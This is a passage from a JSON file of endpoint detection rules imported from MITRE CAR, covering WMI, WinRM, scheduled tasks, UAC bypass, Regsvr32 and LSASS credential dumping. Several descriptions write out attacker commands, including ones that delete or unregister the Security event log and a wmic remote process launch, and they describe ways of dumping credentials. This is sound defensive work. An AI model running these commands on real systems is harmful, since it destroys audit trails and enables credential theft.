`regedit.exe`\n\nAll of these behaviors call into the Windows API, which uses the NamedPipe `WINREG` over SMB to handle the protocol information. This network can be decoded with wireshark or a similar sensor, and can also be detected by hooking the API function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-005.yaml" } }, { "id": "mitre-car-car-2014-11-006", "type": "detection", "name": "Windows Remote Management (WinRM)", "description": "When a [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) connection is opened, the client sends HTTP requests to port 5985 for HTTP or 5986 for HTTPS on the target host. Each HTTP(S) request to the URI \"/wsman\" is called, and other information is set in the headers. Depending on the operation, the HTTP method may vary (i.e., GET, POST, etc.). This analytic would detect Remote PowerShell, as well as other communications that rely on WinRM. Additionally, it outputs the executable on the client host, the connection information, and the hostname of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-006.yaml" } }, { "id": "mitre-car-car-2014-11-007", "type": "detection", "name": "Remote Windows Management Instrumentation (WMI) over RPC", "description": "As described in ATT&CK, an adversary can use [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to view or manipulate objects on a remote host. It can be used to remotely edit configuration, start services, query files, and anything that can be done with a WMI class. When remote WMI requests are over RPC ([CAR-2014-05-001](../CAR-2014-05-001)), it connects to a DCOM interface within the RPC group netsvcs. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as [Event Tracing for Windows](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968803.aspx). Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected.\n\nAlthough the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts.\nMore about RPCSS at : [rpcss_dcom_interfaces.html](http://www.hsc.fr/ressources/articles/win_net_srv/rpcss_dcom_interfaces.html)\n\n### Output Description\n\nIdentifies the connection in which WMI traffic is seen, as well as the process(es) responsible for owning the connection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-007.yaml" } }, { "id": "mitre-car-car-2014-11-008", "type": "detection", "name": "Command Launched from WinLogon", "description": "An adversary can use [accessibility features](https://attack.mitre.org/techniques/T1546/008) (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within [Remote Desktop](https://attack.mitre.org/techniques/T1021/001). To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of `cmd.exe` or `powershell.exe` launched directly from the logon process, `winlogon.exe`. It should be used in tandem with [CAR-2014-11-003](../CAR-2014-11-003), which detects the accessibility programs in the command line.\n\nSeveral accessibility programs can be run using the Ease of Access center\n\n- `sethc.exe` handles StickyKeys\n- `utilman.exe` is the Ease of Access menu\n- `osk.exe` runs the On-Screen Keyboard\n- `narrator.exe` reads screen text over audio\n- `magnify.exe` magnifies the view of the screen near the cursor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-008.yaml" } }, { "id": "mitre-car-car-2014-12-001", "type": "detection", "name": "Remotely Launched Executables via WMI", "description": "Adversaries can use [Windows Management Instrumentation (WMI)](https://attack.mitre.org/techniques/T1047) to move laterally by launching executables remotely. For adversaries to achieve this, they must open a WMI connection to a remote host. This RPC activity is currently detected by [CAR-2014-11-007](../CAR-2014-11-007). After the WMI connection has been initialized, a process can be remotely launched using the command: `wmic /node:\"\" process call create \"\"`, which is detected via [CAR-2016-03-002](../CAR-2016-03-002).\n\nThis leaves artifacts at both a network (RPC) and process (command line) level. When wmic.exe (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the the remote machine.\n\nAfter RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.\n\nWhen the command line is executed, it has the parent process of `C:\\windows\\system32\\wbem\\WmiPrvSE.exe`. This analytic looks for these two events happening in sequence, so that the network connection and target process are output.\n\nCertain strings can be identifiers of the WMI by looking up the interface UUID for IRemUnknown2 in different formats\n\n- UUID `00000143-0000-0000-c000-000000000046` (decoded)\n- Hex `43 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46` (raw)\n- ASCII `CF` (printable text only)\n\nThis identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.\nThe transfer syntax is\n\n- UUID `8a885d04-1ceb-11c9-9fe8-08002b104860` (decoded)\n- Hex `04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60` (raw)\n- ASCII \\`]+H\\`\\` (printable text only)\n\nThus, a great ASCII based signature is\n\n- `*CF*]+H*CF*CF*host*\"`\n\n### Output Description\n\nIdentifies the process that initiated the RPC request (such as wmic.exe or powershell.exe), as well as the source and destination information of the network connection that triggered the alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-12-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-12-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-12-001.yaml" } }, { "id": "mitre-car-car-2015-04-001", "type": "detection", "name": "Remotely Scheduled Tasks via AT", "description": "When AT.exe is used to remotely [schedule tasks](https://attack.mitre.org/techniques/T1053), Windows uses named pipes over [SMB](https://en.wikipedia.org/wiki/Server_Message_Block) to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe \"ATSVC\" is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention `C:\\Windows\\System32\\AT`. Unlike [CAR-2013-05-004](../CAR-2013-05-004), this analytic specifically focuses on uses of AT that can be detected between hosts, indicating remotely gained [execution](https://attack.mitre.org/tactics/TA0002).\n\nThis pipe activity could be discovered with a network decoder, such as that in wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern `C:\\Windows\\System32\\AT\\`.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2015-04-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2015-04-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2015-04-001.yaml" } }, { "id": "mitre-car-car-2015-04-002", "type": "detection", "name": "Remotely Scheduled Tasks via Schtasks", "description": "An adversary can [move laterally](https://attack.mitre.org/tactics/TA0008) using the `schtasks` command to remotely [schedule tasks/jobs](https://attack.mitre.org/techniques/T1053). Although these events can be detected with command line analytics [CAR-2013-08-001](../CAR-2013-08-001), it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). In this cases, an additional source of data becomes necessary to detect adversarial behavior. When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established ([CAR-2014-05-001](../CAR-2014-05-001)), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.\n\nCertain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats\n\n- UUID `86d35949-83c9-4044-b424-db363231fd0c` (decoded)\n- Hex `49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c` (raw)\n- ASCII `IYD@$621` (printable bytes only)\n\nThis identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2015-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2015-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2015-04-002.yaml" } }, { "id": "mitre-car-car-2015-07-001", "type": "detection", "name": "All Logins Since Last Boot", "description": "Once a credential dumper like [mimikatz](https://attack.mitre.org/software/S0002) runs, every user logged on since boot is potentially compromised, because the credentials were accessed via the memory of `lsass.exe`. When such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.\n\nThe time field indicates the first and last time a system reported a user logged into a given system. This means that activity could be intermittent between the times given and should not be considered a duration.\n\n\n### Output Description\n\nA list of hostnames and the users that had been logged into the system at some point after to the system's last restart.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2015-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2015-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2015-07-001.yaml" } }, { "id": "mitre-car-car-2016-03-001", "type": "detection", "name": "Host Discovery Commands", "description": "When entering on a host for the first time, an adversary may try to [discover](https://attack.mitre.org/tactics/TA0007) information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. The information returned may impact choices an adversary can make when [establishing persistence](https://attack.mitre.org/tactics/TA0003), [escalating privileges](https://attack.mitre.org/tactics/TA0004), or [moving laterally](https://attack.mitre.org/tactics/TA0008).\n\nBecause these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.\n\nWithin the built-in Windows Commands:\n\n- `hostname`\n- `ipconfig`\n- `net`\n- `quser`\n- `qwinsta`\n- `sc` with flags `query`, `queryex`, `qc`\n- `systeminfo`\n- `tasklist`\n- `dsquery`\n- `whoami`\n\n**Note** `dsquery` is only pre-existing on Windows servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1087", "T1069", "T1016", "T1082", "T1033", "T1057", "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-03-001.yaml" } }, { "id": "mitre-car-car-2016-03-002", "type": "detection", "name": "Create Remote Process via WMIC", "description": "Adversaries may use [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to move laterally, by launching executables remotely.The analytic [CAR-2014-12-001](../CAR-2014-12-001) describes how to detect these processes with network traffic monitoring and process monitoring on the target host. However, if the command line utility `wmic.exe` is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like `wmic.exe /node:\"\\\" process call create \"\\\"`. It is possible to also connect via IP address, in which case the string `\"\\\"` would instead look like `IP Address`.\n\nAlthough this analytic was created after [CAR-2014-12-001](../CAR-2014-12-001), it is a much simpler (although more limited) approach. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility [PowerShell](https://attack.mitre.org/T1059/001).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-03-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-03-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-03-002.yaml" } }, { "id": "mitre-car-car-2016-04-002", "type": "detection", "name": "User Activity from Clearing Event Logs", "description": "It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. 1. This is often done using `wevtutil`, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network. 2. Alerting when a `Clear Event Log` is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk. 3. Attackers may set the option of the sources of events with `Limit-EventLog -LogName Security -OverflowAction DoNotOverwrite` to not delete old Evenlog when the .evtx is full. By default the Security Log size is configured with the minimum value of 20 480KB (~23 000 EventLog). So if this option is enabled, all the new EventLogs will be automatically deleted. We can detect this behavior with the Security EventLog 1104. 4. Attackers may delete .evtx with `del C:\\Windows\\System32\\winevt\\logs\\Security.evtx` or `Remove-Item C:\\Windows\\System32\\winevt\\logs\\Security.evtx` after having disabled and stopped the Eventlog service. As the EventLog service is disabled and stopped, the .evtx files are no longer used by this service and can be deleted. The new EventLog will be Unavailable until the configuration is reset. 5. Attackers may use the powershell command `Remove-EventLog -LogName Security` to unregister source of events that are part of Windows (Application, Security\u2026). This command deletes the security EventLog (which also generates EventId 1102) but the new Eventlogs are still recorded until the system is rebooted . After the System is rebooted, the Security log is unregistered and doesn\u2019t log any new Eventlog. However logs generated between the command and the reboot are still available in the .evtx file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-002.yaml" } }, { "id": "mitre-car-car-2016-04-003", "type": "detection", "name": "User Activity from Stopping Windows Defensive Services", "description": "Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation.\n\nStopping services events are Windows Event Code 7036.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-003.yaml" } }, { "id": "mitre-car-car-2016-04-004", "type": "detection", "name": "Successful Local Account Login", "description": "The successful use of [Pass The Hash](https://attack.mitre.org/techniques/T1550/002/) for lateral movement between workstations would trigger event ID 4624, with an event level of Information, from the security log. This behavior would be a LogonType of 3 using NTLM authentication where it is not a domain logon and not the ANONYMOUS LOGON account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-004.yaml" } }, { "id": "mitre-car-car-2016-04-005", "type": "detection", "name": "Remote Desktop Logon", "description": "A remote desktop logon, through [RDP](https://attack.mitre.org/techniques/T1021/001), may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-005.yaml" } }, { "id": "mitre-car-car-2019-04-001", "type": "detection", "name": "UAC Bypass", "description": "Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source [UACME](https://github.com/hfiref0x/UACME) tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-001.yaml" } }, { "id": "mitre-car-car-2019-04-002", "type": "detection", "name": "Generic Regsvr32", "description": "Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic. Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-002.yaml" } }, { "id": "mitre-car-car-2019-04-003", "type": "detection", "name": "Squiblydoo", "description": "Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS.\n\nSquiblydoo was first written up by Casey Smith at Red Canary, though that blog post is no longer accessible.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-003.yaml" } }, { "id": "mitre-car-car-2019-04-004", "type": "detection", "name": "Credential Dumping via Mimikatz", "description": "Credential dumpers like Mimikatz can be loaded into memory and from there read data from another processes. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are \u201covertuned\u201d to look for common access patterns used by Mimikatz.\n\n*This requires information about process access, e.g. Sysmon Event ID 10. That currently doesn\u2019t have a CAR data model mapping, since we currently lack any open/access actions for Processes. If this changes, we will update the data model requirements.*", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-004.yaml" } }, { "id": "mitre-car-car-2019-07-001", "type": "detection", "name": "Access Permission Modification", "description": "Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.\n\nNote - this analytic references file permissions, which are not currently in the CAR data model.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-07-001.yaml" } }, { "id": "mitre-car-car-2019-07-002", "type": "detection", "name": "Lsass Process Dump via Procdump", "description": "[ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.\n\nProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name.\n\nNote - the CAR data model currently does not support process access actions, so the pseudocode implementation is based around process creates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-07-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-07-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-07-002.yaml" } }, { "id": "mitre-car-car-2019-08-001", "type": "detection", "name": "Credential Dumping via Windows Task Manager", "description": "The Windows Task Manager may be used to dump the memory space of `lsass.exe` to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting `lsass.exe`, and clicking \"Create dump file\". This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.\n\nThis requires filesystem data to determine whether files have been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-08-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-08-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-08-001.yaml" } }, { "id": "mitre-car-car-2019-08-002", "type": "detection", "name": "Active Directory Dumping via NTDSUtil", "description": "The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching `ntdsutil.exe` as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. This process will create a copy of the Active Directory database, `ntds.dit`, to the specified folder path.\n\nThis requires filesystem data to determine whether files have been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-08-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-08-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-08-002.yaml" } }, { "id": "mitre-car-car-2020-05-001", "type": "detection", "name": "MiniDump of LSASS", "description": "This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call [MiniDumpWriteDump](https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump). Tools like [SafetyKatz](https://github.com/GhostPack/SafetyKatz), [SafetyDump](https://github.com/m0rv4i/SafetyDump), and [Outflank-Dumpert](https://github.com/outflanknl/Dumpert) default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior.\n\nThe analytic is based on a [Sigma analytic](https://github.com/NVISO-BE/sigma-public/blob/master/rules/windows/sysmon/sysmon_lsass_memdump.yml) contributed by Samir Bousseaden and written up in a [blog on MENASEC](https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html). It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in [CAR-2019-08-001](/analytics/CAR-2019-08-001/). In this iteration of the Sigma analytic, the `GrantedAccess` filter isn't included because it didn't seem to filter out any false positives and introduces the potential for evasion.\n\nThis analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives.\n\nNOTE - this analytic has no corresponding pseudocode implementation because the CAR data model doesn't currently support process access events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-05-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-05-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-05-001.yaml" } }, { "id": "mitre-car-car-2020-05-003", "type": "detection", "name": "Rare LolBAS Command Lines", "description": 